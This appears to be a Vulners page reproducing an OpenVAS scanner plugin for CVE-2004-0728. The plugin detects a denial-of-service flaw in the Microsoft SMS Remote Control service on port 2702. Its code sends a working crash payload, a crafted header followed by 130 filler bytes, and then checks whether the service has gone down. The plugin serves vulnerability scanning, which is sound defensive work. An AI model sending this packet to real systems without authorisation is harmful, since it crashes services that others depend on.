Lucene search
+L

Microsoft SMS Client DoS Vulnerability

🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2004 Noam RathausType 
openvas
 openvas
🔗 plugins.openvas.org👁 20 Views

Microsoft SMS Client DoS Vulnerability, Flaw in SMS Remote Control Service Allows Remote Service Crashin

Related
Refs
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Microsoft SMS Remote Control Service Denial of Service (CVE-2004-0728)
1 Dec 200900:00
checkpoint_advisories
CVE
CVE-2004-0728
23 Jul 200404:00
cve
Cvelist
CVE-2004-0728
23 Jul 200404:00
cvelist
NVD
CVE-2004-0728
27 Jul 200404:00
nvd
SourceLink
securityfocuswww.securityfocus.com/bid/10726
# SPDX-FileCopyrightText: 2004 Noam Rathaus
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.13752");
  script_version("2023-07-21T05:05:22+0000");
  script_cve_id("CVE-2004-0728");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/10726");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_name("Microsoft SMS Client DoS Vulnerability");
  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_copyright("Copyright (C) 2004 Noam Rathaus");
  script_family("Denial of Service");
  script_dependencies("find_service.nasl");
  script_require_ports(2702);

  script_tag(name:"summary", value:"A flaw in SMS Remote Control service makes possible to
  crash the service remotely leading to the DoS condition.");

  script_tag(name:"affected", value:"Clients part of Microsoft Systems Management Server
  version 2.50.2726.0 are known to be vulnerable. Other versions or product might be affected as
  well.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year
  since the disclosure of this vulnerability. Likely none will be provided anymore.
  General solution options are to upgrade to a newer release, disable respective features,
  remove the product or replace the product by another one.");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"WillNotFix");

  exit(0);
}

port = 2702;
if( ! get_port_state( port ) )
  exit( 0 );

soc = open_sock_tcp( port );
if( ! soc )
  exit( 0 );

req = raw_string( 0x52, 0x43, 0x48, 0x30, 0x16, 0x00, 0x40, 0x00, 0x52, 0x43, 0x48, 0x45 );
req = string(req, crap( data:raw_string( 0x58 ), length:130 ) );

send( socket:soc, data:req );
sleep( 1 );
close( soc );

soc = open_sock_tcp( port );

if( ! soc ) {
  security_message( port:port );
  exit( 0 );
}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jul 2023 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 25
EPSS0.24793
20